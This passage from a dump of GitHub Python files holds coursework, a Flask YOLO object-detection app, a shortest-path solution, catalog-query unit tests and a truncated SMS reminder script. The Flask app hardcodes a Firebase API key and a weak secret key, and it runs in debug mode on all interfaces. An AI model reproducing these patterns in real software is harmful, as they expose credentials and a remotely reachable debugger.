calcDiff(today,tmpDate)\n\t\n\t\t\tif daysOfDifference >= 365:\n\t\t\t\tdeltaYears = daysOfDifference//365\n\t\t\t\tdaysOfDifference = daysOfDifference-(deltaYears*365)\n\t\t\t\t\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\n{1:^.0f} years and {0:^.0f} days have past between {2:} and today.\\n\"\\\n\t\t\t\t\t.format(daysOfDifference,deltaYears,tmpDate.strftime(\"%d %b, %Y\")))\n\t\t\t\t\n\t\t\telif daysOfDifference >= 0:\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\n{:3^.0f} days have past between {:} and today.\\n\"\\\n\t\t\t\t\t.format(daysOfDifference,tmpDate.strftime(\"%d %m, %Y\")))\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\nThe date entered is in the future and has no days past\\n\")\n\t\n\t\ndef displayAmountDue():\n\tprint(\"\\n\\t:::: Calculate Amount Due ::::\")\n\tstayInLoop = True\n\n\twhile stayInLoop:\n\t\tprint(\"\\n\\t### Enter Due Date ###\")\n\t\ttmpYearDue = getYear()\n\t\tif tmpYearDue == -1:\n\t\t\tstayInLoop = False\n\t\t\t\n\t\telse:\n\t\t\ttmpMonthDue = getMonth()\n\t\t\ttmpDayDue = getDay(tmpYearDue,tmpMonthDue)\n\t\t\ttmpDateDue = date(tmpYearDue,tmpMonthDue,tmpDayDue)\n\t\t\n\t\t\n\t\tif stayInLoop == True:\n\t\t\tprint(\"\\n\\t### Enter Borrowed Date ###\")\n\t\t\ttmpYearBorrowed = getYear()\n\t\t\tif tmpYearBorrowed == -1:\n\t\t\t\tstayInLoop = False\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttmpMonthBorrowed = getMonth()\n\t\t\t\ttmpDayBorrowed = getDay(tmpYearBorrowed,tmpMonthBorrowed)\n\t\t\t\ttmpDateBorrowed = date(tmpYearBorrowed,tmpMonthBorrowed,tmpDayBorrowed)\n\t\t\t\n\t\t\tprint(\"\\n\\t### Enter Daily Fee ###\")\n\t\t\ttmpFee = getDailyFee()\n\t\t\tbalanceDue = calcLateFee(tmpDateBorrowed,tmpDateDue,tmpFee)\t\n\t\t\tprint(\"\\n\\tThe total amount due is ${:<.2f}\\n\".format(balanceDue))\n \n\ndisplayTimePast()\ndisplayAmountDue()\n\n\"\"\"\n\nPart 3: (5 pts)\n\n Call the getYear function to obtain a year from the user.\n\n Print the month and the first Friday of every month in that year.\n HINT: use the monthcalendar method to obtain a calendar object that contains the months for that year:\n myFebCal = calendar.monthcalendar(2016, 2)\n\n(monthcalendar returns a matrix representing a month’s calendar).\n\nwk1 = myFebCal[1] # Each row represents a week.\n\n\n Example:\n Year: 2016\n\nFirst Fridays of every month in year 2016:\nJanuary 8\nFebruary 12\nMarch 11\nApril 8\nMay 6\nJune 10\nJuly 8\nAugust 12\nSeptember 9\nOctober 7\nNovember 11\nDecember 9\n\nScoring Guide:\n\nPart 1\n\n getYear function with appropriate error checking 1 pt\n getMonth function with appropriate error 1 pt\n getDay function with appropriate error 2 pts\n\n calcDiff takes 2 parameters, returns difference of the dates (4 pts).\n checks to make sure a negative # isn’t returned -2 if no check\n\n # of days incorrect -2\n\n # of years incorrect -2\n\n Loops continuously until user types END (2 pts)\n\nPart 2\n\n calcLateFee takes 2 date objects as params and daily fee (float). 2 pts\n\n Correctly calculates and returns total late fee or 0 if no late fee 3 pts\n\nPart 3\n\n Correctly determines the day # of the first Friday of the month for the given year 4 pts\n\n Output includes the MONTH and the day# 1 pt\n\n\n\n\"\"\"\n","repo_name":"Paul-Kummer/CSIS153","sub_path":"Programs/Program10/Paul_Kummer_Program10_V2.py","file_name":"Paul_Kummer_Program10_V2.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70886876353","text":"import numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\nfrom flask import Flask, flash, request, Response, redirect, url_for, render_template\nfrom werkzeug.utils import secure_filename\nimport jsonpickle\nimport io as StringIO\nimport base64\nfrom io import BytesIO\nimport io\nimport json\nfrom PIL import Image\nimport pyrebase\n\n\nconfig = {\n\n \"apiKey\": \"AIzaSyCzEM-a7piep6yfNwaZaRSA5NiDzYDRRO8\",\n \"authDomain\": \"object-detection-yolo-cdf10.firebaseapp.com\",\n \"databaseURL\": \"https://object-detection-yolo-cdf10.firebaseio.com\",\n \"projectId\": \"object-detection-yolo-cdf10\",\n \"storageBucket\": \"object-detection-yolo-cdf10.appspot.com\",\n \"messagingSenderId\": \"940165302494\",\n \"appId\": \"1:940165302494:web:edffa29d72752bbd1d1a4f\",\n \"measurementId\": \"G-DY7RH14R5P\"\n\n\n}\n\nfirebase = pyrebase.initialize_app(config)\n\nstorage = firebase.storage()\n\nconfthres = 0.5\nnmsthres = 0.4\nmy_path = './'\n\ndef get_labels(labels_path):\n lpath=os.path.sep.join([my_path, labels_path])\n LABELS = open(lpath).read().strip().split(\"\\n\")\n return LABELS\n\ndef get_colors(LABELS):\n np.random.seed(42)\n COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype=\"uint8\")\n return COLORS\n\ndef get_weights(weights_path):\n weightsPath = os.path.sep.join([my_path, weights_path])\n return weightsPath\n\ndef get_config(config_path):\n configPath = os.path.sep.join([my_path, config_path])\n return configPath\n\n\n\ndef load_model(configpath,weightspath):\n print(\"[INFO] loading Gsoc Model from disk...\")\n net = cv2.dnn.readNetFromDarknet(configpath, weightspath)\n return net\n\n\ndef image_to_byte_array(image:Image):\n imgByteArr = io.BytesIO()\n image.save(imgByteArr, format='PNG')\n imgByteArr = imgByteArr.getvalue()\n return imgByteArr\n\n\ndef detect_it(image,net,LABELS,COLORS):\n (H, W) = image.shape[:2]\n ln = net.getLayerNames()\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),\n swapRB=True, crop=False)\n net.setInput(blob)\n start = time.time()\n layerOutputs = net.forward(ln)\n print(layerOutputs)\n end = time.time()\n\n print(\"[INFO] Gsoc Model took {:.6f} seconds\".format(end - start))\n\n boxes = []\n confidences = []\n classIDs = []\n\n for output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > confthres:\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype(\"int\")\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, confthres,\n nmsthres)\n\n if len(idxs) > 0:\n for i in idxs.flatten():\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n color = [int(c) for c in COLORS[classIDs[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = \"{}: {:.4f}\".format(LABELS[classIDs[i]], confidences[i])\n print(boxes)\n print(classIDs)\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, color, 2)\n return image\n\nlabelsPath=\"gsoc_model/coco.names\"\ncfgpath=\"gsoc_model/gsoc.cfg\"\nwpath=\"gsoc_model/gsoc.weights\"\nLables=get_labels(labelsPath)\nCFG=get_config(cfgpath)\nWeights=get_weights(wpath)\nnets=load_model(CFG,Weights)\nColors=get_colors(Lables)\n\n# Initialize the Flask application\napp = Flask(__name__)\n\napp.config[\"ALLOWED_EXTENSIONS\"] = [\"png\", \"jpg\", \"jpeg\"]\n\ndef allowed_file(filename):\n return \".\" in filename and \\\n filename.rsplit(\".\", 1)[1].lower() in app.config[\"ALLOWED_EXTENSIONS\"]\n\n# route http posts to this method\n@app.route(\"/api\", methods=[\"GET\", \"POST\"])\ndef main():\n \n if request.method == \"POST\":\n file = request.files[\"file_input\"]\n \n\n if \"file_input\" not in request.files:\n flash(\"No file part\")\n return redirect(request.url)\n\n if file.filename == \" \":\n flash(\"No selected file\")\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n img = request.files[\"file_input\"].read()\n \n img = Image.open(io.BytesIO(img))\n npimg=np.array(img)\n image=npimg.copy()\n image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n\n res=detect_it(image,nets,Lables,Colors) \n \n image=cv2.cvtColor(res,cv2.COLOR_BGR2RGB)\n np_img=Image.fromarray(image)\n img_encoded=image_to_byte_array(np_img)\n mimetype=\"image/jpeg\"\n \n storage.child(\"images/object_detected.jpg\").put(img_encoded)\n \n # print(storage.child(\"banner.jpg\").get_url(None))\n # path = 'static/images'\n # cv2.imwrite(os.path.join(path , \"object.jpg\"), res)\n # cv2.imwrite(\"object.jpg\", res) \n \n # return render_template(\"result.html\", img_url=img_url)\n links = storage.child(\"images/object_detected.jpg\").get_url(None)\n return render_template(\"result.html\", l = links)\n # imageF = Image.open(io.BytesIO(img_encoded))\n \n # return render_template(\"result.html\", img_encoded=imageF)\n return render_template(\"index.html\")\n # return Response(response=img_encoded, status=200,mimetype=\"image/jpeg\")\n\n # start flask app\nif __name__ == '__main__':\n app.secret_key = \"key_key\"\n app.run(debug=True, host='0.0.0.0')\n\n\n\n","repo_name":"Digaari/caMicroscope","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42712964836","text":"\n\nfrom collections import deque\nimport sys\n\n\ndef read():\n return sys.stdin.readline().rstrip()\n\n\ndef solution(st, ed):\n global n, g\n inf = 100000*100000\n dist = [inf for _ in range(n)]\n visit = [False for _ in range(n)]\n from_ = [-1 for _ in range(n)]\n dist[st] = 0\n\n selected = st\n while selected != ed:\n visit[selected] = True\n for (to, cost) in g[selected]:\n #dist[to] = min(dist[to], dist[selected]+cost)\n if dist[selected]+cost < dist[to]:\n from_[to] = selected\n dist[to] = dist[selected]+cost\n # select\n min_dist = inf\n for (i, d) in enumerate(dist):\n if visit[i]:\n continue\n if d < min_dist:\n min_dist = d\n selected = i\n\n route = []\n prev = ed\n while prev != -1:\n route.append(prev)\n prev = from_[prev]\n\n route.reverse()\n route = list(map(lambda x: x+1, route))\n return (dist[ed], route)\n\n\nn = int(read())\nm = int(read())\ng = [[] for _ in range(n)]\n\nfor _ in range(m):\n fr, to, cost = map(int, read().split())\n g[fr-1].append((to-1, cost))\n\nx, y = map(int, read().split())\n\n(cost, route) = solution(x-1, y-1)\nroute = list(map(str, route))\n\nprint(cost)\nprint(len(route))\nprint(' '.join(route))\n","repo_name":"SJ0000/PS","sub_path":"BOJ/BOJ_11779.py","file_name":"BOJ_11779.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37308093037","text":"from flask import Flask, render_template, request\napp = Flask(__name__)\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hello_world():\n a = \"\"\n country = ['Russia', 'Italy', 'USA']\n print(request.form)\n if request.method == \"POST\":\n if request.form.get(\"country_list\") == 'USA':\n a = 'RED'\n return render_template(\"index.html\", country=country, a=a)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='80')","repo_name":"ZeroShka/pythonskills","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70133963716","text":"class Ventilador:\n def __init__(self, cor, potencia, tensao, preco):\n self.preco = preco\n self.__cor = cor\n self.__potencia = potencia\n self.__tensao = tensao\n\n def cor(self):\n return self.__cor\n\n\nclass Pessoa:\n def __init__(self, nome, saldo_na_conta):\n self.nome = nome\n self.saldo_na_conta = saldo_na_conta\n self.ventilador = None\n\n def comprar_ventilador(self, ventilador):\n if ventilador.preco <= self.saldo_na_conta:\n self.saldo_na_conta -= ventilador.preco\n self.ventilador = ventilador\n\n def __str__(self) -> str:\n if self.ventilador:\n return f\"{ self.nome } - possui um ventilador\"\n return f\"{ self.nome } - não possui um ventilador\"\n\n\nventilador_potente = Ventilador(\"preto\", potencia=250, tensao=220, preco=100)\ncomprador = Pessoa(nome=\"Daniel\", saldo_na_conta=500)\ncomprador.comprar_ventilador(ventilador_potente)\n\ncomprador2 = Pessoa(\"Eduarda\", 50)\n\nprint(comprador)\nprint(comprador2)\n","repo_name":"DannOut/Trybe-exercicios","sub_path":"P.O.O-Python/examples/fixacao1.py","file_name":"fixacao1.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4634408978","text":"import functools\nimport time\nimport unittest\n\nimport zope.component.testing\nimport zope.intid.interfaces\nfrom testfixtures import LogCapture\nfrom zope.catalog.catalog import Catalog\nfrom zope.catalog.field import FieldIndex\nfrom zope.catalog.interfaces import ICatalog\nfrom zope.catalog.text import TextIndex\nfrom zope.component import getUtility\nfrom zope.component import provideUtility\nfrom zope.container.contained import Contained\nfrom zope.interface import Attribute\nfrom zope.interface import Interface\nfrom zope.interface import implementer\n\nfrom hurry.query import query\nfrom hurry.query.interfaces import IQuery\n\n\n\"\"\"Bring `query` testcoverage to 100% without polluting the doctest\"\"\"\n\n\nclass IContent(Interface):\n f1 = Attribute('f1')\n f2 = Attribute('f2')\n f3 = Attribute('f3')\n f4 = Attribute('f4')\n t1 = Attribute('t1')\n t2 = Attribute('t2')\n\n\n@functools.total_ordering\n@implementer(IContent)\nclass Content(Contained):\n\n def __init__(self, id, f1='', f2='', f3='', f4='', t1='', t2=''):\n self.id = id\n self.f1 = f1\n self.f2 = f2\n self.f3 = f3\n self.f4 = f4\n self.t1 = t1\n self.t2 = t2\n\n def __lt__(self, other):\n return self.id < other.id\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __repr__(self):\n return f'<Content \"{self.id}\">'\n\n\n@implementer(zope.intid.interfaces.IIntIds)\nclass DummyIntId:\n MARKER = '__dummy_int_id__'\n\n def __init__(self):\n self.counter = 0\n self.data = {}\n\n def register(self, obj):\n intid = getattr(obj, self.MARKER, None)\n if intid is None:\n setattr(obj, self.MARKER, self.counter)\n self.data[self.counter] = obj\n intid = self.counter\n self.counter += 1\n return intid\n\n def getId(self, obj):\n return getattr(obj, self.MARKER)\n\n def getObject(self, intid):\n return self.data[intid]\n\n def __iter__(self):\n return iter(self.data)\n\n\nf1 = ('catalog1', 'f1')\n\n\nclass QueryTestBase(unittest.TestCase):\n\n tearDown = zope.component.testing.tearDown\n\n def setUp(self):\n \"\"\"emulate the doctest fixtures\"\"\"\n self.intid = DummyIntId()\n provideUtility(self.intid, zope.intid.interfaces.IIntIds)\n self.catalog = Catalog()\n provideUtility(self.catalog, ICatalog, 'catalog1')\n self.catalog['f1'] = FieldIndex('f1', IContent)\n self.catalog['f2'] = FieldIndex('f2', IContent)\n self.catalog['f3'] = FieldIndex('f3', IContent)\n self.catalog['f4'] = FieldIndex('f4', IContent)\n self.catalog['t1'] = TextIndex('t1', IContent)\n self.catalog['t2'] = TextIndex('t2', IContent)\n provideUtility(query.Query(), IQuery)\n self.setup_content()\n\n def setup_content(self):\n content = [\n Content(1, 'a', 'b', 'd'),\n Content(2, 'a', 'c'),\n Content(3, 'X', 'c'),\n Content(4, 'a', 'b', 'e'),\n Content(5, 'X', 'b', 'e'),\n Content(6, 'Y', 'Z')]\n for entry in content:\n self.catalog.index_doc(self.intid.register(entry), entry)\n\n def searchResults(self, q, **kw):\n query = getUtility(IQuery)\n return query.searchResults(q, **kw)\n\n def displayQuery(self, q, **kw):\n r = self.searchResults(q, **kw)\n return [e.id for e in sorted(list(r))]\n\n def test_setup(self):\n \"\"\"verify test fixtures by reproducing first doctest\"\"\"\n self.assertEqual(self.displayQuery(\n query.All(f1)),\n [1, 2, 3, 4, 5, 6])\n\n\nclass TimingTest(QueryTestBase):\n\n def test_init(self):\n timer = query.Timing('foo', 1)\n self.assertEqual(timer.key, 'foo')\n self.assertGreater(timer.start, 0)\n self.assertEqual(timer.start_order, 1)\n self.assertEqual(timer.end, None)\n self.assertEqual(timer.end_order, None)\n\n def test_done(self):\n timer = query.Timing()\n timer.done(2)\n self.assertGreater(timer.end, 0)\n self.assertEqual(timer.end_order, 2)\n\n def test_total(self):\n timer = query.Timing()\n time.sleep(.1)\n timer.done()\n self.assertGreater(timer.total, 0)\n\n def test_total_wo_end(self):\n timer = query.Timing()\n self.assertEqual(timer.total, None)\n\n\nclass TimingAwareCacheTest(QueryTestBase):\n\n def test_init(self):\n cache = query.TimingAwareCache({})\n self.assertEqual(cache.cache, {})\n self.assertEqual(cache.timing, {})\n self.assertEqual(cache.count, 0)\n self.assertEqual(cache.post, None)\n\n def test_start_post(self):\n cache = query.TimingAwareCache({})\n cache.start_post()\n self.assertGreater(cache.post.start, 0)\n\n def test_end_post(self):\n cache = query.TimingAwareCache({})\n with self.assertRaises(AttributeError):\n cache.end_post()\n\n cache.start_post()\n time.sleep(0.1)\n cache.end_post()\n self.assertGreater(cache.post.total, 0)\n\n def test_get_uncached(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n value = cache.get('foo')\n self.assertEqual(value, None)\n self.assertTrue('foo' in cache.timing)\n self.assertGreater(cache.timing['foo'].start, 0)\n self.assertEqual(cache.timing['foo'].end, None)\n self.assertEqual(cache.count, 1)\n\n def test_get_cached(self):\n cache = query.TimingAwareCache({'foo': 'bar'})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n value = cache.get('foo')\n self.assertEqual(value, 'bar')\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n\n def test_dunder_setitem(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n cache['foo'] = 'bar'\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n\n def test_dunder_setitem_timing(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n cache.get('foo')\n self.assertEqual(cache.count, 1)\n cache['foo'] = 'bar'\n self.assertTrue('foo' in cache.timing)\n self.assertGreater(cache.timing['foo'].start, 0)\n self.assertGreater(cache.timing['foo'].end, 0)\n self.assertEqual(cache.count, 2)\n\n def test_report_empty(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.report()\n records = logged.records\n\n self.assertEqual(records, [])\n\n def test_report_uncached(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.report()\n records = logged.records\n\n self.assertEqual(records[0].levelname, 'INFO')\n self.assertEqual(records[0].module, 'query')\n self.assertIn('Catalog query', records[0].msg)\n self.assertIn('s for terms', records[0].msg)\n self.assertIn('s to finish', records[0].msg)\n self.assertIn('s: foo', records[1].msg)\n\n def test_report_uncached_post(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.end_post()\n cache.report()\n records = logged.records\n\n self.assertEqual(records[0].levelname, 'INFO')\n self.assertEqual(records[0].module, 'query')\n self.assertIn('Catalog query', records[0].msg)\n self.assertIn('s for terms', records[0].msg)\n self.assertIn('s to finish', records[0].msg)\n self.assertIn('s: foo', records[1].msg)\n\n def test_report_uncached_post_under_over(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.end_post()\n cache.report(over=1)\n records = logged.records\n\n self.assertEqual(records, [])\n\n def test_report_uncached_mixedup_order(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.get('foobar')\n cache['foobar'] = 'foobar'\n cache.get('foo')\n cache.get('bar')\n cache['bar'] = 'bar'\n cache['foo'] = 'foo'\n cache.get('baz')\n cache['baz'] = 'baz'\n cache.report()\n records = logged.records\n\n # verify dedent from 5 spaces to 1 space\n self.assertEqual(len(records[1].msg) - len(records[1].msg.lstrip(' ')),\n 5)\n self.assertEqual(len(records[3].msg) - len(records[3].msg.lstrip(' ')),\n 1)\n\n def test_report_uncached_no_end_post(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache.end_post()\n cache.get('foobar')\n cache['foo'] = 'bar'\n cache.report()\n records = logged.records\n\n self.assertTrue(records[2].msg.endswith(' ?: foobar.'))\n\n\nclass QueryTest(QueryTestBase):\n\n def test_injected_caching(self):\n class MockCaching:\n _cache = dict()\n _get = 0\n _set = 0\n\n def get(self, key):\n self._get += 1\n return self._cache.get(key)\n\n def __setitem__(self, key, value):\n self._set += 1\n self._cache[key] = value\n\n caching = MockCaching()\n self.searchResults(query.And(query.All(f1)), caching=caching)\n self.assertEqual(caching._get, 2)\n self.assertEqual(caching._set, 2)\n\n self.searchResults(query.And(query.All(f1)), caching=caching)\n self.assertEqual(caching._get, 3)\n self.assertEqual(caching._set, 2)\n self.assertEqual(\n sorted(caching._cache.keys()),\n [('all', 'catalog1', 'f1'), ('and', ('all', 'catalog1', 'f1'))])\n self.assertEqual(\n [v.keys() for v in caching._cache.values()],\n [[0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]])\n\n def test_timing(self):\n with LogCapture() as logged:\n self.searchResults(\n query.And(query.All(f1)), timing=.00000001)\n records = logged.records\n\n self.assertEqual(len(records), 3)\n self.assertIn(\"('and', ('all', 'catalog1', 'f1')\", records[1].msg)\n self.assertIn(\"('all', 'catalog1', 'f1')\", records[2].msg)\n\n def test_timing_cutoff(self):\n with LogCapture() as logged:\n self.searchResults(query.And(query.All(f1)), timing=5)\n records = logged.records\n\n self.assertEqual(len(records), 0)\n\n def test_timing_noresult(self):\n with LogCapture() as logged:\n results = self.displayQuery(\n query.And(query.Eq(f1, 'foo')), timing=.00000001)\n records = logged.records\n\n self.assertEqual(results, [])\n self.assertEqual(len(records), 3)\n\n\nclass TermsTest(QueryTestBase):\n\n def test_Term_apply(self):\n term = query.Term()\n with self.assertRaises(NotImplementedError):\n term.apply(None)\n\n def test_Term_dunder_rand(self):\n class AndDisabledAll(query.All):\n\n def __and__(self, other):\n return NotImplemented\n\n left = AndDisabledAll(f1)\n right = query.All(f1)\n\n self.assertEqual(self.displayQuery(\n left & right),\n [1, 2, 3, 4, 5, 6])\n\n def test_Term_dunder_ror(self):\n class OrDisabledAll(query.All):\n\n def __or__(self, other):\n return NotImplemented\n\n left = OrDisabledAll(f1)\n right = query.All(f1)\n\n self.assertEqual(self.displayQuery(\n left | right),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_one_result(self):\n self.assertEqual(self.displayQuery(\n query.And(query.All(f1))),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_empty_intersection(self):\n self.assertEqual(self.displayQuery(\n query.And(query.Eq(f1, 'a'), query.Eq(f1, 'X'))),\n [])\n\n def test_And_weighted(self):\n # this only executes the code path without any clue what the\n # impact of 'weighted' should be, if any\n self.assertEqual(self.displayQuery(\n query.And(query.All(f1), query.All(f1), weighted=True)),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_weighted_empty_intersection(self):\n self.assertEqual(self.displayQuery(\n query.And(query.Eq(f1, 'a'), query.Eq(f1, 'X'), weighted=True)),\n [])\n\n def test_Or_one_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Or(query.Eq(f1, 'foo'))),\n [])\n\n def test_Or_one_result(self):\n self.assertEqual(self.displayQuery(\n query.Or(query.All(f1))),\n [1, 2, 3, 4, 5, 6])\n\n def test_Difference_one_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Difference(query.Eq(f1, 'foo'))),\n [])\n\n def test_Difference_second_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Difference(query.All(f1), query.Eq(f1, 'foo'))),\n [1, 2, 3, 4, 5, 6])\n\n def test_Difference_empty_difference(self):\n self.assertEqual(self.displayQuery(\n query.Difference(query.All(f1), query.All(f1))),\n [])\n\n def test_In_one_result(self):\n self.assertEqual(self.displayQuery(\n query.In(f1, ['Y', 'Z'])),\n [6])\n","repo_name":"zopefoundation/hurry.query","sub_path":"src/hurry/query/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":13996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30210845520","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils import timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('HuskyJamGuru', '0012_issuetypeupdate_author'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='issuetypeupdate',\n name='time',\n field=models.DateTimeField(default=timezone.now(), auto_now=True),\n preserve_default=False,\n ),\n ]\n","repo_name":"fedtf/guru","sub_path":"HuskyJamGuru/migrations/0013_issuetypeupdate_time.py","file_name":"0013_issuetypeupdate_time.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34329017692","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport sys\n\nif len(sys.argv) >1:\n samplefile = sys.argv[1]\nelse:\n print(\"enter file name\")\n\ndf = pd.read_excel(samplefile,skiprows=35)\nmean = df.iloc[0,1:]\nstdev = df.iloc[1,1:]\n\nmean_op = pd.DataFrame()\nstdev_op = pd.DataFrame()\n\nfor a in ['A','B','C','D','E','F','G','H']:\n d = mean.filter(regex=a)\n d.name = a\n d.index = np.arange(1,13,1)\n mean_op = mean_op.append(d)\n\nfor a in ['A','B','C','D','E','F','G','H']:\n d = stdev.filter(regex=a)\n d.name = a\n d.index = np.arange(1,13,1)\n stdev_op = stdev_op.append(d)\n\nmean_op.to_excel('OD.xlsx')\nstdev_op.to_excel('OD_stdev.xlsx')\n","repo_name":"furubayashim/reshape-OD-xls","sub_path":"reshape-OD-xls.py","file_name":"reshape-OD-xls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"165479697","text":"import time\nimport datetime\nimport shelve\nvx=6.4\nvy=5.6\n# y=0\n# x=0\n# RED=108\n# GREEN=42\nfinishx=470\nfinishy=410\n\ndb=shelve.open(\"periods of lights [r]\")\n\nfor red in range(31,131):\n RED=red\n GREEN=150-red\n db[str(red)]=0\n for first in range(0,150):\n for second in range(0,150):\n print(RED,GREEN,first,second)\n y=0\n x=0\n\n now_stay_green=max(0,GREEN-first)\n now_stay_red=min(RED,150-first)\n time_now=0\n while x<=finishx and y<=finishy:\n color=1\n # sec=max(0,GREEN-first)\n while now_stay_green>0 and x<=finishx and y<=finishy:\n # print(int(x),int(y),sec)\n x+=vx\n y+=vy\n time_now+=1\n now_stay_green-=1\n if x<finishx and y<finishy:\n color=0\n time_now+=now_stay_red\n now_stay_green=GREEN\n now_stay_red=RED\n\n # time_last=datetime.datetime.now()\n\n x=0\n y=0\n\n\n second_time=max(0,GREEN-second)\n now_stay_red=min(RED,150-second)\n now_stay_green=max(0,RED-second)\n while x<=finishx and y<=finishy:\n color=0\n # sec=max(0,GREEN-first)\n while now_stay_red>0 and x<=finishx and y<=finishy:\n # print(int(x),int(y),sec)\n x+=vx\n y+=vy\n time_now+=1\n now_stay_red-=1\n if x<finishx and y<finishy:\n color=0\n time_now+=now_stay_green\n now_stay_green=GREEN\n now_stay_red=RED\n result_time=max(time_now,second_time)\n # result_time=max(time_last-time_now,time_last_sure-time_last)\n db[str(RED)]=max(db[str(RED)],result_time)\n # print(time_last-time_now)\ndb.close()\n","repo_name":"Digitaljay/cloud_traffic_system","sub_path":"optimum.py","file_name":"optimum.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73140665153","text":"# coding=utf-8\nimport os\nfrom datetime import datetime, date\nimport requests\nimport yaml\nimport json\nimport random\n\nclass GFEverydaySMS:\n weather_types = {\"风\": 1, \"云\": 2, \"雨\": 3, \"雪\": 4, \"霜\": 5, \"露\": 6, \"雾\": 7, \"雷\": 8, \"晴\": 9, \"阴\": 10,\n \"feng\": 1, \"yun\": 2, \"yu\": 3, \"xue\": 4, \"shuang\": 5, \"lu\": 6, \"wu\": 7, \"lei\": 8, \"qing\": 9, \"yin\": 10}\n urls = {\"zaoan\": 'http://api.tianapi.com/txapi/zaoan/index?key={0}',\n \"tianqi\": 'http://api.tianapi.com/txapi/tianqi/index?key={0}&city={1}',\n \"wanan\": 'http://api.tianapi.com/txapi/wanan/index?key={0}',\n \"qinghua\": 'http://api.tianapi.com/txapi/saylove/index?key={0}',\n \"sms\": 'https://api.binstd.com/sms/send?appkey={0}&mobile={1}&content={2}'}\n # 注意:顺序影响短信编辑\n zaoan_apis = [\"zaoan\", \"tianqi\"]\n wanan_apis = [\"qinghua\", \"wanan\"]\n\n def __init__(self):\n self.sms_list, self.dictum_channels, self.text_emoji_file, self.tx_api_key, self.bin_std_api_key = self.get_init_data()\n\n def get_init_data(self):\n '''\n 初始化基础数据\n :return: None\n '''\n with open('_config.yaml', 'r', encoding='utf-8') as f:\n config = yaml.load(f, Loader=yaml.Loader)\n morning_alarm_timed = config.get('morning_alarm_timed').strip()\n evening_alarm_timed = config.get('evening_alarm_timed').strip()\n init_msg = f\"每天定时发送时间:早-{morning_alarm_timed}, 